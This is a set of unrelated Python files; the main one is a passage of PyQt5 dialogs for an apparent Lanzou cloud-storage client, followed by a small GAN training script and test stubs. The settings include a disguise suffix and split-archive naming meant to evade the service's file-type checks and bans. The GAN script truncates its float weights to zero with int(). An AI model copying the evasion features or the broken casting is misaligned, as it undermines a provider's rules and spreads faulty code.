self._pwd = ""
self._cookie = ""
self.initUI()
self.setStyleSheet(dialog_qss_style)
self.setMinimumWidth(350)
# 信号
self.name_ed.textChanged.connect(self.set_user)
self.pwd_ed.textChanged.connect(self.set_pwd)
self.cookie_ed.textChanged.connect(self.set_cookie)
def default_var(self):
try:
with open(self._config, "rb") as _file:
_info = load(_file)
self._user = _info["user"]
self._pwd = _info["pwd"]
cookies = _info["cookie"]
self._cookie = ";".join([str(k) +'='+ str(v) for k,v in cookies.items()])
except Exception:
pass
self.name_ed.setText(self._user)
self.pwd_ed.setText(self._pwd)
self.cookie_ed.setPlainText(str(self._cookie))
def initUI(self):
self.setWindowTitle("登录蓝奏云")
self.setWindowIcon(QIcon("./icon/login.ico"))
logo = QLabel()
logo.setPixmap(QPixmap("./icon/logo3.gif"))
logo.setStyleSheet("background-color:rgb(0,153,255);")
logo.setAlignment(Qt.AlignCenter)
self.name_lb = QLabel("&User")
self.name_lb.setAlignment(Qt.AlignCenter)
self.name_ed = QLineEdit()
self.name_lb.setBuddy(self.name_ed)
self.pwd_lb = QLabel("&Password")
self.pwd_lb.setAlignment(Qt.AlignCenter)
self.pwd_ed = QLineEdit()
self.pwd_ed.setEchoMode(QLineEdit.Password)
self.pwd_lb.setBuddy(self.pwd_ed)
self.cookie_lb = QLabel("&Cookie")
self.cookie_ed = QTextEdit()
notice = "如果由于滑动验证,无法使用用户名与密码登录,则需要输入cookie,自行使用浏览器获取,\n" \
"cookie会保持在本地,下次使用。其格式如下:\n\n key1=value1; key2=value2"
self.cookie_ed.setPlaceholderText(notice)
self.cookie_lb.setBuddy(self.cookie_ed)
self.show_input_cookie_btn = QPushButton("显示Cookie输入框")
self.show_input_cookie_btn.setToolTip(notice)
self.show_input_cookie_btn.setStyleSheet("QPushButton {min-width: 110px;max-width: 110px;}")
self.show_input_cookie_btn.clicked.connect(self.change_show_input_cookie)
self.ok_btn = QPushButton("登录")
self.ok_btn.clicked.connect(self.change_ok_btn)
self.cancel_btn = QPushButton("取消")
self.cancel_btn.clicked.connect(self.change_cancel_btn)
self.form = QFormLayout()
self.form.addRow(self.name_lb, self.name_ed)
self.form.addRow(self.pwd_lb, self.pwd_ed)
hbox = QHBoxLayout()
hbox.addWidget(self.show_input_cookie_btn)
hbox.addStretch(1)
hbox.addWidget(self.ok_btn)
hbox.addWidget(self.cancel_btn)
vbox = QVBoxLayout()
vbox.addWidget(logo)
vbox.addStretch(1)
vbox.addLayout(self.form)
vbox.addStretch(1)
vbox.addLayout(hbox)
self.setLayout(vbox)
self.default_var()
def change_show_input_cookie(self):
self.form.addRow(self.cookie_lb, self.cookie_ed)
pass
def set_user(self, user):
self._user = user
def set_pwd(self, pwd):
self._pwd = pwd
def set_cookie(self):
cookies = self.cookie_ed.toPlainText()
try:
self._cookie = {kv.split("=")[0].strip(" "): kv.split("=")[1].strip(" ") for kv in cookies.split(";")}
except Exception:
self._cookie = None
def change_cancel_btn(self):
self.default_var()
self.close()
def change_ok_btn(self):
up_info = {"user": self._user, "pwd": self._pwd, "cookie": self._cookie}
update_settings(self._config, up_info)
self.clicked_ok.emit()
self.close()
class UploadDialog(QDialog):
"""文件上传对话框"""
new_infos = pyqtSignal(object)
def __init__(self):
super().__init__()
self.cwd = os.getcwd()
self.selected = []
self.max_len = 400
self.initUI()
self.set_size()
self.setStyleSheet(dialog_qss_style)
def set_values(self, folder_name):
self.setWindowTitle("上传文件至 ➩ " + str(folder_name))
def initUI(self):
self.setWindowTitle("上传文件")
self.setWindowIcon(QIcon("./icon/upload.ico"))
self.logo = QLabel()
self.logo.setPixmap(QPixmap("./icon/logo3.gif"))
self.logo.setStyleSheet("background-color:rgb(0,153,255);")
self.logo.setAlignment(Qt.AlignCenter)
# btn 1
self.btn_chooseDir = QPushButton("选择文件夹", self)
self.btn_chooseDir.setObjectName("btn_chooseDir")
self.btn_chooseDir.setObjectName("btn_chooseDir")
self.btn_chooseDir.setIcon(QIcon("./icon/folder.gif"))
# btn 2
self.btn_chooseMutiFile = QPushButton("选择多文件", self)
self.btn_chooseDir.setObjectName("btn_chooseMutiFile")
self.btn_chooseMutiFile.setObjectName("btn_chooseMutiFile")
self.btn_chooseMutiFile.setIcon(QIcon("./icon/file.ico"))
# btn 3
self.btn_deleteSelect = QPushButton("移除", self)
self.btn_deleteSelect.setObjectName("btn_deleteSelect")
self.btn_deleteSelect.setIcon(QIcon("./icon/delete.ico"))
# 列表
self.list_view = QListView(self)
self.list_view.setViewMode(QListView.ListMode)
self.slm = QStandardItem()
self.model = QStandardItemModel()
self.list_view.setModel(self.model)
self.model.removeRows(0, self.model.rowCount()) # 清除旧的选择
self.list_view.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.list_view.setSelectionBehavior(QAbstractItemView.SelectRows)
self.list_view.setSelectionMode(QAbstractItemView.ExtendedSelection)
self.buttonBox = QDialogButtonBox()
self.buttonBox.setOrientation(Qt.Horizontal)
self.buttonBox.setStandardButtons(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)
self.buttonBox.button(QDialogButtonBox.Ok).setText("确定")
self.buttonBox.button(QDialogButtonBox.Cancel).setText("取消")
grid = QGridLayout()
grid.setSpacing(10)
grid.addWidget(self.logo, 1, 0, 1, 3)
grid.addWidget(self.btn_chooseDir, 2, 0)
grid.addWidget(self.btn_chooseMutiFile, 2, 2)
grid.addWidget(self.list_view, 3, 0, 2, 3)
grid.addWidget(self.btn_deleteSelect, 5, 0)
grid.addWidget(self.buttonBox, 5, 1, 1, 2)
self.setLayout(grid)
self.setMinimumWidth(350)
# 设置信号
self.btn_chooseDir.clicked.connect(self.slot_btn_chooseDir)
self.btn_chooseMutiFile.clicked.connect(self.slot_btn_chooseMutiFile)
self.btn_deleteSelect.clicked.connect(self.slot_btn_deleteSelect)
self.buttonBox.accepted.connect(self.slot_btn_ok)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.clear_old)
self.buttonBox.rejected.connect(self.reject)
def set_size(self):
rows = self.model.rowCount()
for i in range(rows):
m_len = int(len(self.model.item(i, 0).text()) * 4)
if m_len > self.max_len:
self.max_len = m_len
rows = 10 if rows >= 10 else rows # 限制最大高度
self.resize(self.max_len, 250+rows*28)
def clear_old(self):
self.selected = []
self.model.removeRows(0, self.model.rowCount())
self.set_size()
def slot_btn_ok(self):
if self.selected:
self.new_infos.emit(self.selected)
self.clear_old()
def slot_btn_deleteSelect(self):
_indexes = self.list_view.selectionModel().selection().indexes()
if not _indexes:
return
indexes = []
for i in _indexes: # 获取所选行号
indexes.append(i.row())
indexes = set(indexes)
for i in sorted(indexes, reverse=True):
self.selected.remove(self.model.item(i, 0).text())
self.model.removeRow(i)
self.set_size()
def slot_btn_chooseDir(self):
dir_choose = QFileDialog.getExistingDirectory(self, "选择文件夹", self.cwd) # 起始路径
if dir_choose == "":
return
if dir_choose not in self.selected:
self.selected.append(dir_choose)
self.model.appendRow(QStandardItem(QIcon("./icon/folder.gif"), dir_choose))
self.set_size()
def slot_btn_chooseMutiFile(self):
files, _ = QFileDialog.getOpenFileNames(self, "选择多文件", self.cwd, "All Files (*)")
if len(files) == 0:
return
for _file in files:
if _file not in self.selected:
self.selected.append(_file)
self.model.appendRow(QStandardItem(QIcon("./icon/file.ico"), _file))
self.set_size()
class InfoDialog(QDialog, Ui_Dialog):
"""文件信息对话框"""
def __init__(self, infos, parent=None):
super().__init__(parent)
self.setupUi(self)
self.infos = infos
self.initUI()
self.setStyleSheet(dialog_qss_style)
def initUI(self):
self.buttonBox.button(QDialogButtonBox.Close).setText("关闭")
self.setWindowTitle("文件信息" if self.infos[2] else "文件夹信息")
self.setWindowIcon(QIcon("./icon/share.ico"))
self.logo.setPixmap(QPixmap("./icon/q9.gif"))
self.logo.setAlignment(Qt.AlignCenter)
self.logo.setStyleSheet("background-color:rgb(255,204,51);")
self.tx_name.setText(self.infos[1])
self.tx_name.setReadOnly(True)
if self.infos[2]:
self.tx_size.setText(self.infos[2])
else:
self.tx_size.hide()
self.lb_size.hide()
if self.infos[3]:
self.tx_time.setText(self.infos[3])
else:
self.lb_time.hide()
self.tx_time.hide()
if self.infos[4]:
self.tx_dl_count.setText(str(self.infos[4]))
else:
self.tx_dl_count.hide()
self.lb_dl_count.hide()
self.tx_share_url.setText(self.infos[7])
self.tx_share_url.setReadOnly(True)
line_h = 28 # 行高
self.tx_share_url.setMinimumHeight(line_h)
self.tx_share_url.setMaximumHeight(line_h)
self.lb_share_url.setMinimumHeight(line_h)
self.lb_share_url.setMaximumHeight(line_h)
self.lb_name.setMinimumHeight(line_h)
self.lb_name.setMaximumHeight(line_h)
self.tx_name.setMinimumHeight(line_h)
self.tx_name.setMaximumHeight(line_h)
self.lb_pwd.setMinimumHeight(line_h)
self.lb_pwd.setMaximumHeight(line_h)
self.tx_pwd.setMinimumHeight(line_h)
self.tx_pwd.setMaximumHeight(line_h)
self.tx_pwd.setText(self.infos[5])
self.tx_pwd.setReadOnly(True)
self.tx_dl_link.setText(self.infos[8])
min_width = int(len(self.infos[1]) * 7.8)
if self.infos[8] == "无":
if min_width < 380:
min_width = 380
min_height = 260
dl_link_height = line_h
else:
if min_width < 480:
min_width = 480
min_height = 420
dl_link_height = 120
self.setMinimumSize(QSize(min_width, min_height))
self.resize(min_width, min_height)
self.tx_dl_link.setMinimumHeight(dl_link_height)
self.tx_dl_link.setMaximumHeight(dl_link_height)
self.lb_dl_link.setMinimumHeight(dl_link_height)
self.lb_dl_link.setMaximumHeight(dl_link_height)
class RenameDialog(QDialog):
out = pyqtSignal(object)
def __init__(self, parent=None):
super(RenameDialog, self).__init__(parent)
self.infos = None
self.min_width = 400
self.initUI()
self.update_text()
self.setStyleSheet(dialog_qss_style)
def set_values(self, infos):
self.infos = infos
self.update_text() # 更新界面
def initUI(self):
self.setWindowIcon(QIcon("./icon/desc.ico"))
self.lb_name = QLabel()
self.lb_name.setText("文件夹名:")
self.lb_name.setAlignment(Qt.AlignRight | Qt.AlignTrailing | Qt.AlignVCenter)
self.tx_name = QLineEdit()
self.lb_desc = QLabel()
self.tx_desc = QTextEdit()
self.lb_desc.setText("描 述:")
self.lb_desc.setAlignment(Qt.AlignRight | Qt.AlignTrailing | Qt.AlignVCenter)
self.buttonBox = QDialogButtonBox()
self.buttonBox.setOrientation(Qt.Horizontal)
self.buttonBox.setStandardButtons(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)
self.buttonBox.button(QDialogButtonBox.Ok).setText("确定")
self.buttonBox.button(QDialogButtonBox.Cancel).setText("取消")
self.grid = QGridLayout()
self.grid.setSpacing(10)
self.grid.addWidget(self.lb_name, 1, 0)
self.grid.addWidget(self.tx_name, 1, 1)
self.grid.addWidget(self.lb_desc, 2, 0)
self.grid.addWidget(self.tx_desc, 2, 1, 5, 1)
self.grid.addWidget(self.buttonBox, 7, 1, 1, 1)
self.setLayout(self.grid)
self.buttonBox.accepted.connect(self.btn_ok)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.reject)
def update_text(self):
if self.infos:
self.buttonBox.button(QDialogButtonBox.Ok).setToolTip("") # 去除新建文件夹影响
self.buttonBox.button(QDialogButtonBox.Ok).setEnabled(True) # 去除新建文件夹影响
self.setWindowTitle("修改文件夹名与描述")
self.tx_name.setText(str(self.infos[1]))
if self.infos[6]:
self.tx_desc.setText("")
self.tx_desc.setPlaceholderText(str(self.infos[6]))
else:
self.tx_desc.setPlaceholderText("无")
self.min_width = len(str(self.infos[1])) * 8
if self.infos[2]: # 文件无法重命名,由 infos[2] size表示文件
self.setWindowTitle("修改文件描述")
self.tx_name.setFocusPolicy(Qt.NoFocus)
self.tx_name.setReadOnly(True)
else:
self.tx_name.setFocusPolicy(Qt.StrongFocus)
self.tx_name.setReadOnly(False)
else:
self.setWindowTitle("新建文件夹")
self.tx_name.setText("")
self.buttonBox.button(QDialogButtonBox.Ok).setEnabled(False)
self.buttonBox.button(QDialogButtonBox.Ok).setToolTip("请先输入文件名!")
self.tx_name.textChanged.connect(self.slot_new_ok_btn)
self.tx_name.setPlaceholderText("不支持空格,如有会被自动替换成 _")
self.tx_name.setFocusPolicy(Qt.StrongFocus)
self.tx_name.setReadOnly(False)
self.tx_desc.setPlaceholderText("可选项,建议160字数以内。")
if self.min_width < 400:
self.min_width = 400
self.resize(self.min_width, 200)
def slot_new_ok_btn(self):
"""新建文件夹槽函数"""
self.buttonBox.button(QDialogButtonBox.Ok).setEnabled(True)
self.buttonBox.button(QDialogButtonBox.Ok).setToolTip("")
def btn_ok(self):
new_name = self.tx_name.text()
new_desc = self.tx_desc.toPlainText()
if not self.infos: # 在 work_id 新建文件夹
if new_name:
self.out.emit(("new", "", new_name, new_desc))
else:
return
elif new_name != self.infos[1] or(new_desc and new_desc != self.infos[6]):
if self.infos[2]: # 文件
self.out.emit(("file", self.infos[0], new_name, new_desc))
else:
self.out.emit(("folder", self.infos[0], new_name, new_desc))
class SetPwdDialog(QDialog):
new_infos = pyqtSignal(object)
def __init__(self, parent=None):
super(SetPwdDialog, self).__init__(parent)
self.infos = None
self.initUI()
self.update_text()
self.setStyleSheet(dialog_qss_style)
def set_values(self, infos):
self.infos = infos
self.update_text() # 更新界面
def set_tip(self): # 用于提示状态
self.setWindowTitle("请稍等……")
def initUI(self):
self.setWindowTitle("请稍等……")
self.setWindowIcon(QIcon("./icon/password.ico"))
self.lb_oldpwd = QLabel()
self.lb_oldpwd.setText("当前提取码:")
self.lb_oldpwd.setAlignment(Qt.AlignRight | Qt.AlignTrailing | Qt.AlignVCenter)
self.tx_oldpwd = QLineEdit()
# 当前提取码 只读
self.tx_oldpwd.setFocusPolicy(Qt.NoFocus)
self.tx_oldpwd.setReadOnly(True)
self.lb_newpwd = QLabel()
self.lb_newpwd.setText("新的提取码:")
self.lb_newpwd.setAlignment(Qt.AlignRight | Qt.AlignTrailing | Qt.AlignVCenter)
self.tx_newpwd = QLineEdit()
self.buttonBox = QDialogButtonBox()
self.buttonBox.setOrientation(Qt.Horizontal)
self.buttonBox.setStandardButtons(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)
self.buttonBox.button(QDialogButtonBox.Ok).setText("确定")
self.buttonBox.button(QDialogButtonBox.Cancel).setText("取消")
self.grid = QGridLayout()
self.grid.setSpacing(10)
self.grid.addWidget(self.lb_oldpwd, 1, 0)
self.grid.addWidget(self.tx_oldpwd, 1, 1)
self.grid.addWidget(self.lb_newpwd, 2, 0)
self.grid.addWidget(self.tx_newpwd, 2, 1)
self.grid.addWidget(self.buttonBox, 3, 0, 1, 2)
self.setLayout(self.grid)
self.buttonBox.accepted.connect(self.btn_ok)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.accepted.connect(self.set_tip)
self.buttonBox.rejected.connect(self.reject)
self.buttonBox.rejected.connect(self.set_tip)
self.setMinimumWidth(280)
def update_text(self):
if self.infos:
if self.infos[5]:
self.tx_oldpwd.setText(str(self.infos[5]))
self.tx_oldpwd.setPlaceholderText("")
else:
self.tx_oldpwd.setText("")
self.tx_oldpwd.setPlaceholderText("无")
if self.infos[2]: # 文件 通过size列判断是否为文件
self.setWindowTitle("修改文件提取码")
self.tx_newpwd.setPlaceholderText("2-6位字符,关闭请留空")
self.tx_newpwd.setMaxLength(6) # 最长6个字符
else: # 文件夹
self.setWindowTitle("修改文件夹名提取码")
self.tx_newpwd.setPlaceholderText("2-12位字符,关闭请留空")
self.tx_newpwd.setMaxLength(12) # 最长12个字符
def btn_ok(self):
new_pwd = self.tx_newpwd.text()
if new_pwd != self.infos[5]:
self.new_infos.emit((self.infos[0], new_pwd, self.infos[2])) # 最后一位用于标示文件还是文件夹
class MoveFileDialog(QDialog):
'''移动文件对话框'''
new_infos = pyqtSignal(object)
def __init__(self, infos, all_dirs_dict, parent=None):
super(MoveFileDialog, self).__init__(parent)
self.infos = infos
self.dirs = all_dirs_dict
self.initUI()
self.setStyleSheet(dialog_qss_style)
def initUI(self):
for i in self.infos:
if not i[2]: # 非文件
self.infos.remove(i)
self.setWindowTitle("移动文件")
self.setWindowIcon(QIcon("./icon/move.ico"))
self.lb_name = QLabel()
self.lb_name.setText("文件路径:")
self.lb_name.setAlignment(Qt.AlignRight | Qt.AlignTrailing | Qt.AlignVCenter)
self.tx_name = QLineEdit()
names = " | ".join([i[1] for i in self.infos])
names_tip = "\n".join([i[1] for i in self.infos])
self.tx_name.setText(names)
self.tx_name.setToolTip(names_tip)
# 只读
self.tx_name.setFocusPolicy(Qt.NoFocus)
self.tx_name.setReadOnly(True)
self.lb_new_path = QLabel()
self.lb_new_path.setText("目标文件夹:")
self.lb_new_path.setAlignment(
Qt.AlignRight | Qt.AlignTrailing | Qt.AlignVCenter
)
self.tx_new_path = QComboBox()
f_icon = QIcon("./icon/folder.gif")
for f_name, fid in self.dirs.items():
if len(f_name) > 50: # 防止文件夹名字过长?
f_name = f_name[:47] + "..."
self.tx_new_path.addItem(f_icon, "id:{:>8},name:{}".format(fid, f_name))
self.buttonBox = QDialogButtonBox()
self.buttonBox.setOrientation(Qt.Horizontal)
self.buttonBox.setStandardButtons(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)
self.buttonBox.button(QDialogButtonBox.Ok).setText("确定")
self.buttonBox.button(QDialogButtonBox.Cancel).setText("取消")
self.grid = QGridLayout()
self.grid.setSpacing(10)
self.grid.addWidget(self.lb_name, 1, 0)
self.grid.addWidget(self.tx_name, 1, 1)
self.grid.addWidget(self.lb_new_path, 2, 0)
self.grid.addWidget(self.tx_new_path, 2, 1)
self.grid.addWidget(self.buttonBox, 3, 0, 1, 2)
self.setLayout(self.grid)
self.buttonBox.accepted.connect(self.btn_ok)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.reject)
self.setMinimumWidth(280)
def btn_ok(self):
selected = self.tx_new_path.currentText().split(",")[0].split(":")[1]
self.new_infos.emit([(info[0], selected, info[1]) for info in self.infos])
class DeleteDialog(QDialog):
new_infos = pyqtSignal(object)
def __init__(self, infos, parent=None):
super(DeleteDialog, self).__init__(parent)
self.infos = infos
self.out = []
self.initUI()
self.setStyleSheet(dialog_qss_style)
def set_file_icon(self, name):
suffix = name.split(".")[-1]
ico_path = "./icon/{}.gif".format(suffix)
if os.path.isfile(ico_path):
return QIcon(ico_path)
else:
return QIcon("./icon/file.ico")
def initUI(self):
self.setWindowTitle("确认删除")
self.setWindowIcon(QIcon("./icon/delete.ico"))
self.layout = QVBoxLayout()
self.list_view = QListView()
self.list_view.setViewMode(QListView.ListMode)
# 列表
self.slm = QStandardItem()
self.model = QStandardItemModel()
max_len = 10
count = 0
for i in self.infos:
if i[2]: # 有大小,是文件
self.model.appendRow(QStandardItem(self.set_file_icon(i[1]), i[1]))
else:
self.model.appendRow(QStandardItem(QIcon("./icon/folder.gif"), i[1]))
self.out.append({'fid': i[0], 'is_file': True if i[2] else False, 'name': i[1]}) # id,文件标示, 文件名
count += 1
if max_len < len(i[1]): # 使用最大文件名长度
max_len = len(i[1])
self.list_view.setModel(self.model)
self.lb_name = QLabel("尝试删除以下{}个文件(夹):".format(count))
self.buttonBox = QDialogButtonBox()
self.buttonBox.setOrientation(Qt.Horizontal)
self.buttonBox.setStandardButtons(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)
self.buttonBox.button(QDialogButtonBox.Ok).setText("确定")
self.buttonBox.button(QDialogButtonBox.Cancel).setText("取消")
self.layout.addWidget(self.lb_name)
self.layout.addWidget(self.list_view)
self.layout.addWidget(self.buttonBox)
self.setLayout(self.layout)
self.buttonBox.accepted.connect(self.btn_ok)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.reject)
self.setMinimumWidth(400)
self.resize(int(max_len*8), int(count*34+60))
def btn_ok(self):
self.new_infos.emit(self.out)
class AboutDialog(QDialog):
out = pyqtSignal(object)
def __init__(self, parent=None):
super(AboutDialog, self).__init__(parent)
self.initUI()
self.setStyleSheet(dialog_qss_style)
def set_values(self, version):
self.lb_name_text.setText("<font color=blue>"+version+"</font>") # 更新版本
def initUI(self):
about = '''
本项目使用PyQt5实现图形界面,可以完成蓝奏云的大部分功能<br/>
得益于 API 的功能,可以间接突破单文件最大 100MB 的限制,同时增加了批量上传/下载的功能<br/>
Python 依赖见<a href="https://github.com/rachpt/lanzou-gui/blob/master/requirements.txt">requirements.txt</a>,<a href="https://github.com/rachpt/lanzou-gui/releases">releases</a> 有打包好了的 Windows 可执行程序,但可能不是最新的
'''
project_url = '''
主 repo : <a href="https://github.com/rachpt/lanzou-gui">https://github.com/rachpt/lanzou-gui</a><br/>
镜像 repo : <a href="https://gitee.com/rachpt/lanzou-gui">https://gitee.com/rachpt/lanzou-gui</a>
'''
self.setWindowTitle("关于 lanzou-gui")
self.logo = QLabel() # logo
self.logo.setPixmap(QPixmap("./icon/logo2.gif"))
self.logo.setStyleSheet("background-color:rgb(255,255,255);")
self.logo.setAlignment(Qt.AlignCenter)
self.lb_name = QLabel("版本") # 版本
self.lb_name_text = QLabel("") # 版本
self.lb_about = QLabel("About") # about
self.lb_about_text = QTextEdit(about) # about
self.lb_about_text.setFocusPolicy(Qt.NoFocus)
self.lb_about_text.setReadOnly(True)
# self.lb_about_text.setOpenExternalLinks(True)
self.lb_author = QLabel("Author") # author
self.lb_author_mail = QLabel("rachpt@126.com") # author
self.lb_update = QLabel("更新地址") # 更新
self.lb_update_url = QLabel(project_url)
self.lb_update_url.setOpenExternalLinks(True)
self.buttonBox = QDialogButtonBox()
self.buttonBox.setOrientation(Qt.Horizontal)
self.buttonBox.setStandardButtons(QDialogButtonBox.Close)
self.buttonBox.button(QDialogButtonBox.Close).setText("关闭")
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.reject)
self.grid = QGridLayout()
self.grid.setSpacing(10)
self.grid.addWidget(self.logo, 1, 0, 2, 3)
self.grid.addWidget(self.lb_name, 3, 0)
self.grid.addWidget(self.lb_name_text, 3, 1)
self.grid.addWidget(self.lb_about, 4, 0)
self.grid.addWidget(self.lb_about_text, 4, 1, 3, 2)
self.grid.addWidget(self.lb_author, 7, 0)
self.grid.addWidget(self.lb_author_mail, 7, 1)
self.grid.addWidget(self.lb_update, 8, 0)
self.grid.addWidget(self.lb_update_url, 8, 1, 2, 2)
self.grid.addWidget(self.buttonBox, 10, 2)
self.setLayout(self.grid)
self.setFixedSize(660, 300)
class SettingDialog(QDialog):
saved = pyqtSignal()
def __init__(self, config_file: str, default_settings: dict, parent=None):
super(SettingDialog, self).__init__(parent)
self.cwd = os.getcwd()
self._config_file = config_file
self._default_settings = default_settings
self.rar_tool = None
self.download_threads = None
self.max_size = None
self.timeout = None
self.guise_suffix = None
self.rar_part_name = None
self.dl_path = None
self.time_fmt = False
self.initUI()
self.set_values()
self.setStyleSheet(dialog_qss_style)
def open_dialog(self):
""""打开前先更新一下显示界面"""
self.set_values()
self.exec()
def read_values(self):
"""读取配置信息"""
try:
with open(self._config_file, "rb") as _file:
configs = load(_file)
settings = configs["settings"]
except Exception:
settings = self._default_settings
return settings
def show_values(self):
"""控件显示值"""
self.rar_tool_var.setText(self.rar_tool)
self.download_threads_var.setText(str(self.download_threads))
self.max_size_var.setText(str(self.max_size))
self.timeout_var.setText(str(self.timeout))
self.guise_suffix_var.setText(str(self.guise_suffix))
self.rar_part_name_var.setText(str(self.rar_part_name))
self.dl_path_var.setText(str(self.dl_path))
self.time_fmt_box.setChecked(self.time_fmt)
def set_values(self, reset=False):
"""设置控件对应变量初始值"""
settings = self._default_settings if reset else self.read_values()
self.rar_tool = settings["rar_tool"]
self.download_threads = settings["download_threads"]
self.max_size = settings["max_size"]
self.timeout = settings["timeout"]
self.guise_suffix = settings["guise_suffix"]
self.rar_part_name = settings["rar_part_name"]
self.dl_path = settings["dl_path"]
self.time_fmt = settings["time_fmt"]
self.show_values()
def get_values(self) -> dict:
"""读取控件值"""
self.rar_tool = self.rar_tool_var.text()
self.download_threads = int(self.download_threads_var.text())
self.max_size = float(self.max_size_var.text())
self.timeout = float(self.timeout_var.text())
self.guise_suffix = str(self.guise_suffix_var.text())
self.rar_part_name = str(self.rar_part_name_var.text())
self.dl_path = str(self.dl_path_var.text())
return {"rar_tool": self.rar_tool, "download_threads": self.download_threads,
"max_size": self.max_size, "guise_suffix": self.guise_suffix, "dl_path": self.dl_path,
"timeout": self.timeout, "rar_part_name": self.rar_part_name, "time_fmt": self.time_fmt}
def initUI(self):
self.setWindowTitle("设置")
logo = QLabel() # logo
logo.setPixmap(QPixmap("./icon/logo2.gif"))
logo.setStyleSheet("background-color:rgb(255,255,255);")
logo.setAlignment(Qt.AlignCenter)
self.rar_tool_lb = QLabel("rar路径") # rar路径
self.rar_tool_var = MyLineEdit(self)
self.rar_tool_var.clicked.connect(self.set_rar_path)
self.rar_tool_var.setPlaceholderText("用于大文件分卷压缩与分卷合并")
self.rar_tool_var.setToolTip("用于大文件分卷压缩与分卷合并")
self.download_threads_lb = QLabel("同时下载文件数") # about
self.download_threads_var = QLineEdit()
self.download_threads_var.setPlaceholderText("范围:1-7")
self.download_threads_var.setToolTip("范围:1-7")
self.max_size_lb = QLabel("分卷大小(MB)")
self.max_size_var = QLineEdit()
self.max_size_var.setPlaceholderText("普通用户最大100,vip用户根据具体情况设置")
self.max_size_var.setToolTip("普通用户最大100,vip用户根据具体情况设置")
self.timeout_lb = QLabel("请求超时(秒)")
self.timeout_var = QLineEdit()
self.timeout_var.setPlaceholderText("范围:2-30")
self.timeout_var.setToolTip("范围:2-30")
self.guise_suffix_lb = QLabel("假后缀")
self.guise_suffix_var = QLineEdit()
self.guise_suffix_var.setPlaceholderText("让不支持的文件类型改成该后缀名,蒙混过关")
self.guise_suffix_var.setToolTip("让不支持的文件类型改成该后缀名,蒙混过关")
self.rar_part_name_lb = QLabel("rar分卷名")
self.rar_part_name_var = QLineEdit()
self.rar_part_name_var.setPlaceholderText("大文件分卷标识字符串,对抗封禁")
self.rar_part_name_var.setToolTip("大文件分卷标识字符串,对抗封禁")
self.dl_path_lb = QLabel("下载保存路径")
self.dl_path_var = MyLineEdit(self)
self.dl_path_var.clicked.connect(self.set_download_path)
self.time_fmt_box = QCheckBox("使用[年-月-日]时间格式")
self.time_fmt_box.toggle()
self.time_fmt_box.stateChanged.connect(self.change_time_fmt)
buttonBox = QDialogButtonBox()
buttonBox.setOrientation(Qt.Horizontal)
buttonBox.setStandardButtons(QDialogButtonBox.Reset | QDialogButtonBox.Save | QDialogButtonBox.Cancel)
buttonBox.button(QDialogButtonBox.Reset).setText("重置")
buttonBox.button(QDialogButtonBox.Save).setText("保存")
buttonBox.button(QDialogButtonBox.Cancel).setText("取消")
buttonBox.button(QDialogButtonBox.Reset).clicked.connect(lambda: self.set_values(reset=True))
buttonBox.button(QDialogButtonBox.Save).clicked.connect(self.slot_save)
buttonBox.rejected.connect(self.reject)
form = QFormLayout()
form.setSpacing(10)
form.addRow(self.download_threads_lb, self.download_threads_var)
form.addRow(self.timeout_lb, self.timeout_var)
form.addRow(self.guise_suffix_lb, self.guise_suffix_var)
form.addRow(self.max_size_lb, self.max_size_var)
form.addRow(self.rar_part_name_lb, self.rar_part_name_var)
form.addRow(self.rar_tool_lb, self.rar_tool_var)
form.addRow(self.dl_path_lb, self.dl_path_var)
vbox = QVBoxLayout()
vbox.addWidget(logo)
vbox.addStretch(1)
vbox.addLayout(form)
vbox.addStretch(1)
vbox.addWidget(self.time_fmt_box)
vbox.addStretch(1)
vbox.addWidget(buttonBox)
self.setLayout(vbox)
self.setMinimumWidth(500)
def change_time_fmt(self, state):
if state == Qt.Checked:
self.time_fmt = True
else:
self.time_fmt = False
def set_rar_path(self):
"""设置RAR路径"""
rar_path, _ = QFileDialog.getOpenFileName(self, "选择 rar 路径", self.cwd, "All Files (*)")
if len(rar_path) == 0:
return
rar_path = os.path.normpath(rar_path) # windows backslash
self.rar_tool_var.setText(rar_path)
self.rar_tool = rar_path
def set_download_path(self):
"""设置下载路径"""
dl_path = QFileDialog.getExistingDirectory(self, "选择文件下载保存文件夹", self.cwd)
dl_path = os.path.normpath(dl_path) # windows backslash
if dl_path == self.dl_path or dl_path == ".":
return
self.dl_path_var.setText(dl_path)
self.dl_path = dl_path
def slot_save(self):
"""保存槽函数"""
update_settings(self._config_file, self.get_values(), is_settings=True)
self.saved.emit()
self.close()
|
import os
import time
import tensorflow as tf
from tensorflow.keras.initializers import RandomNormal
from tensorflow.keras import Sequential
from tensorflow.keras.layers import Dense, BatchNormalization, \
LeakyReLU, Conv2DTranspose, Conv2D, Dropout, Flatten, Reshape
import scipy as sp
import numpy as np
from LkGAN import LkGAN
k, version, trial_number, seed_num = 1, 1, 1, 1
if int(version) == 1:
alpha = 0.6
beta = 0.4
elif int(version) == 2:
alpha = 1
beta = 0
else:
alpha = 0
beta = 1
if int(version) == 3:
gamma = 1
else:
gamma = (alpha + beta)/2.0
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
np.random.seed(int(seed_num))
tf.random.set_random_seed(int(seed_num))
model = LkGAN(round(float(k), 1), int(version), int(alpha), int(beta), int(gamma), int(trial_number))
model.build()
model.train(n_epochs=100)
|
from django.test import TestCase
from django.contrib.auth.models import User
from .models import healthservices,neighbourhood
import datetime as dt
# Create your tests here.
class neighbourhoodTestClass(TestCase):
def setUp(self):
self.kataret = neighbourhood(neighbourhood='kataret')
def test_instance(self):
self.assertTrue(isinstance(self.kataret,neighbourhood))
def tearDown(self):
neighbourhood.objects.all().delete()
def test_save_method(self):
self.kataret.save_neighbourhood()
hood = neighbourhood.objects.all()
self.assertTrue(len(hood)>0)
|
import pytest
import numpy as np
from ..posrich import posrich
import pkg_resources
PATH = pkg_resources.resource_filename(__name__, 'test_data/')
